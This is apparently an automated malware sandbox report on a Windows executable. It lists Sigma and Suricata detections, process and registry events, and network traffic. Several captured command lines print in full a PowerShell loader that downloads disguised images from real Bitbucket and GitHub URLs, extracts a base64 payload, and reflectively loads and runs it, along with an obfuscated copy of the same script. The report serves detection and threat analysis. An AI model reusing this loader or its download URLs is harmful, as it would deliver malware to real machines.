[System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startInde
        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J
        Sigma detected: Script Interpreter Execution From Suspicious Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 675c87f6bfee1.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7248, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , ProcessId: 7360, ProcessName: wscript.exe
        Sigma detected: Suspicious Script Execution From Temp Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 675c87f6bfee1.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7248, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , ProcessId: 7360, ProcessName: wscript.exe
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 675c87f6bfee1.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7248, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , ProcessId: 7360, ProcessName: wscript.exe
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\GdGXG0bnxH.exe, ProcessId: 2404, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startInde
        Sigma detected: Use Short Name Path in Command Line
        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 675c87f6bfee1.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7248, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , ProcessId: 7360, ProcessName: wscript.exe
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 675c87f6bfee1.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7248, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , ProcessId: 7360, ProcessName: wscript.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J

        Data Obfuscation

        barindex
        Sigma detected: Powershell download and load assembly
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startInde

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-16T15:36:24.556728+010020490381A Network Trojan was detected185.199.109.133443192.168.2.749701TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: GdGXG0bnxH.exeReversingLabs: Detection: 39%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E830EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,4_2_00007FF7E6E830EC
        Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49700 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49701 version: TLS 1.2
        Source: GdGXG0bnxH.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: wextract.pdb source: GdGXG0bnxH.exe
        Source: Binary string: wextract.pdbGCTL source: GdGXG0bnxH.exe
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 0000000B.00000002.1496797841.0000024985320000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: n.pdb{ source: powershell.exe, 0000000B.00000002.1497283898.0000024986DC9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: s\dll\System.Core.pdbn source: powershell.exe, 0000000B.00000002.1497238738.0000024986D66000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdbG_a_ S__CorExeMainmscoree.dll source: powershell.exe, 0000000B.00000002.1496797841.0000024985320000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E8204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_00007FF7E6E8204C

        Software Vulnerabilities

        barindex
        Suspicious execution chain found
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.109.133:443 -> 192.168.2.7:49701
        Source: global trafficHTTP traffic detected: GET /jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /gmedusa135/nano/refs/heads/main/new_img123.jpg HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /eqweqwt/wqeqwfs/downloads/agchIkI.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
        Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
        Source: Joe Sandbox ViewIP Address: 185.166.143.50 185.166.143.50
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /gmedusa135/nano/refs/heads/main/new_img123.jpg HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
